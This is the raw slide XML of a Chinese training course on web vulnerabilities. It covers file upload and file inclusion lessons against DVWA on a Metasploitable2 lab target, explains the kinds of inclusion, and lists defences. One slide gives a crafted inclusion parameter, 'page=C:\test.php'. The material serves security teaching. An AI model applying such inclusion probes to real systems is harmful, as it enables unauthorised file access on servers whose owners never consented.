                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用BurpSuite完成对medium级别的文件上传漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr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42275"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2295525" y="2428240"/>
          <a:ext cx="8157845" cy="3762375"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1069975"/>
                <a:gridCol w="422021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项目名称：6.3 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>文件上传漏洞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600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>文件上传</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>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eaLnBrk="0" hangingPunct="0">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="CC0000"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1600" b="0">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>文件上传漏洞的攻击与防御</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:sym typeface="+mn-ea"/>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2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="1853381"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>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6"/>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custDataLst>
                <p:tags r:id="rId7"/>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custDataLst>
                <p:tags r:id="rId8"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="13" name="表格 12"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>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lang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>6.3 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>文件上传漏洞</a:t>
                      </a:r>
                      <a:endParaRPr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任务拓展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>】</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eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对靶机Metasploitable2-Linux的DVWA进行文件上传漏洞的利用。</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04</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sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>6.4 </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文件包含漏洞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0">
    <p:random/>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34" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14834"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3"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任务描述</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN"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84" y="6880"/>
                <a:ext cx="1622"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【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="1681480"/>
            <a:ext cx="10800080" cy="1702435"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>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理解文件包含漏洞。</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掌握文件包含漏洞的利用。</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掌握文件包含漏洞的防御方法。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标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499110" y="1320165"/>
            <a:ext cx="11002010" cy="1621790"/>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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>新建网站扫描</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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（2）点击Save按钮，进入扫描基本设置界面。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 -2147482514"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="-1191" b="17548"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2135505" y="2279015"/>
            <a:ext cx="7738110" cy="425069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【任务分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1681200"/>
            <a:ext cx="10800000" cy="40538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上传文件包含漏洞是一种常见的依赖于脚本运行而影响Web应用程序的漏洞，许多</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>脚本语言支持使用包含文件(Include File),这种功能允许开发者把可使用的代码插入到单个文件中，在需要的时候将它们包含在特殊功能的代码中，然后，包含文件中的代码被解释，就好像它们插入到包含指令的位置一样。</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rPr>
              <a:t>本任务介绍文件包含漏洞、分析文件包含漏洞代码，讲解文件包含漏洞的利用方法，介绍防范文件包含漏洞的措施。</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L="0" marR="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>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blipFill rotWithShape="0">
          <a:blip r:embed="rId1" cstate="screen"/>
          <a:stretch>
            <a:fillRect r="4000"/>
          </a:stretch>
        </a:blipFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>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5"/>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文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1681200"/>
            <a:ext cx="10800000" cy="3479165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <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一、</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文件包含漏洞</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文件包含漏洞通常发生在应用程序使用用户输入来构建文件路径时，而没有适当地验证或过滤这些输入。攻击者可以利用这一点，通过修改输入参数来访问或包含服务器上的其他文件，甚至可能包含远程服务器上的文件。</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文件包含漏洞</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分</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为两种类型：一种是本地包含漏洞，也就是包含的文件是在本地服务器上的；另一种是远程文件包含漏洞，包含的文件可以是来自别的服务器上的。</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文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1681200"/>
            <a:ext cx="10869295" cy="3479165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二、文件包含漏洞的防范措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" indent="609600" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="200" checksum="4158780845"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防御本地文件包含，从代码层来讲，在开发过程中应该尽量避免动态的变量，尤其是用户可以控制的变量。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" indent="609600" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="200" checksum="4158780845"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>采用白名单的方式将允许包含的文件列出来，只允许包含白名单中的文件，这样就可以避免任意文件包含的风险</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" indent="609600" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="200" checksum="4158780845"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将文件包含漏洞利用过程中的一些特殊字符定义在黑名单中，对传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>入</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的参数进行过。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="1681480"/>
            <a:ext cx="10800080" cy="3488690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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en-US" sz="2400" kern="100" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件包含漏洞分为两种类型：本地文件包含漏洞和远程文件包含。为了深入掌握这两种漏洞的原理和利用方法，我们将在两台服务器上分别创建脚本，然后，我们将在客户机上利用DVWA平台提供的文件包含漏洞，执行这些脚本，以实现在服务器端对脚本代码的解释执行。本节的学习任务分为两部分：</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">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a typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一、low级别的文件包含漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">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a typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二、分析medium、high和impossible级别的文件包含源代码。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">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51840" y="1828165"/>
            <a:ext cx="10800080" cy="273939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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上安装了DVWA平台。访问地址：http://192.168.1.201/dvwa/。</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标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>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5"/>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6" name="表格 5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="856800" y="2303780"/>
          <a:ext cx="10553700" cy="1285240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1003300"/>
                <a:gridCol w="3870325"/>
                <a:gridCol w="2212975"/>
                <a:gridCol w="3467100"/>
              </a:tblGrid>
              <a:tr h="3048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编号</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IP地址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用途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服务器A</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192.168.1.228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服务器B</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00" cy="510667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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、攻击准备</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spcBef>
                <a:spcPts val="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点击三个文件链接中的任何一个，DVWA平台会包含相应的文件，并</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显示</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文件内容。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101"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2322000" y="1823720"/>
            <a:ext cx="7560000" cy="3159030"/>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00" cy="529082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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"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攻击准备</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="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点击“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>file1.php</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，包含</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ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>file1.php</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文件，</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显示文件内容</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5842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2202556426"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="23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说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="23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服务器包含文件时，不管文件后缀是否是php，都会尝试做php文件执行，如果文件内容确为php，则会正常执行并返回结果，如果不是，则会原封不动地打印文件内容。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2300" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101"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1875600" y="2228850"/>
            <a:ext cx="8448675" cy="2971800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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00" y="1325245"/>
            <a:ext cx="10972165" cy="40087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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、查看源代码，分析漏洞利用方法</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en-US" altLang="zh-CN"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en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="2000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可以看到，服务器对page参数没有做任何的过滤。</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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482560"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3060000" y="1971040"/>
            <a:ext cx="6084000" cy="1025592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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974070" cy="159702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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、查看源代码，分析漏洞利用方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="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我们</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利用不可控的page参数进行渗透，构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>page=C:\test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，这里</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C:\test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是不存在的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
